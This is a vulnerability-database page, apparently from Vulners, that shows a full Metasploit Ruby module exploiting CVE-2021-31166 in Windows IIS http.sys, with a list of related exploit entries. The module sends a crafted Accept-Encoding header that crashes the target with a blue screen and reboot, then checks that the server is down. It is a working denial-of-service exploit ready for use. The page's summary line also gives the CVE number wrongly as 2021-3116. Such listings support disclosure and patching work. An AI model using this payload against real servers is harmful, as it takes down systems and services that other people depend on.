Lucene search
K

Windows IIS HTTP Protocol Stack DOS

🗓️ 17 Mar 2022 17:52:42Reported by Max, Stefan Blair, Axel Souchet, Maurice LAMBERT <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 509 Views

Windows IIS HTTP Protocol Stack Denial of Service (DOS) via CVE-2021-3116

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Use After Free in Microsoft
7 Mar 202218:56
githubexploit
GithubExploit
Exploit for Deserialization of Untrusted Data in Ibm Aspera_Faspex
9 Mar 202322:03
githubexploit
GithubExploit
Exploit for Use After Free in Microsoft
17 May 202119:55
githubexploit
GithubExploit
Exploit for Use After Free in Microsoft
22 Nov 202209:10
githubexploit
GithubExploit
Exploit for Use After Free in Microsoft
17 May 202123:54
githubexploit
GithubExploit
Exploit for Use After Free in Microsoft
16 May 202116:15
githubexploit
GithubExploit
Exploit for CVE-2022-21907
9 Dec 202322:26
githubexploit
GithubExploit
Exploit for Use After Free in Microsoft
17 May 202119:55
githubexploit
GithubExploit
Exploit for Use After Free in Microsoft
17 May 202111:12
githubexploit
GithubExploit
Exploit for CVE-2022-21907
17 Jan 202215:42
githubexploit
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows IIS HTTP Protocol Stack DOS',
        'Description' => %q{
          This module exploits CVE-2021-31166, a UAF bug in http.sys
          when parsing specially crafted Accept-Encoding headers
          that was patched by Microsoft in May 2021, on vulnerable
          IIS servers. Successful exploitation will result in
          the target computer BSOD'ing before subsequently rebooting.
          Note that the target IIS server may or may not come back up,
          this depends on the target's settings as to whether IIS
          is configured to start on reboot.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Max',                                             # Aka @_mxms. Vulnerability discovery
          'Stefan Blair',                                    # Aka @fzzyhd1. Vulnerability discovery
          'Axel Souchet',                                    # Aka @0vercl0k. PoC exploit
          'Maurice LAMBERT <mauricelambert434[at]gmail.com>' # msf module
        ],
        'Platform' => 'win',
        'References' => [
          ['CVE', '2021-31166'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31166'],
          ['URL', 'https://github.com/mauricelambert/CVE-2021-31166'],
          ['URL', 'https://twitter.com/metr0/status/1392631376592076805'],
          ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166']
        ],
        'DisclosureDate' => '2021-05-11',
        'Notes' => {
          'Stability' => [CRASH_OS_RESTARTS],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
        }
      )
    )

    register_options(
      [
        OptString.new(
          'TARGETURI', [true, 'The URI of the IIS Server.', '/']
        )
      ]
    )
  end

  # This module performs a DOS attack using a simple HTTP request.
  def run
    print_status('Connecting to target to make sure its alive...')

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, ''),
      'method' => 'GET'
    )

    if res.nil?
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the target IIS server - no response")
    end

    print_good('Successfully connected to target. Sending payload...')

    payload =
      "#{Rex::Text.rand_text_alpha(5)}, #{Rex::Text.rand_text_alpha(3)}, ,"

    exploit_headers = {
      'Accept-Encoding' => payload
    }

    begin
      send_request_cgi({
        'uri' => normalize_uri(target_uri.path, ''),
        'timeout' => 1, # short timeout -> the server should not respond
        'method' => 'GET',
        'headers' => exploit_headers
      })
    rescue Rex::ConnectionError, Errno::ECONNRESET
      print_good('Connection reset by target server or connection failed when sending the malicious payload!')
    ensure
      print_good('Payload was sent to the target server.')
      print_status('Checking that the server is down...')
    end

    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, ''),
        'method' => 'GET'
      )

      if res.nil?
        print_good('Target is down.')
      else
        print_error('Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.')
      end
    rescue Rex::ConnectionError, Errno::ECONNRESET
      print_good('Target is down.')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation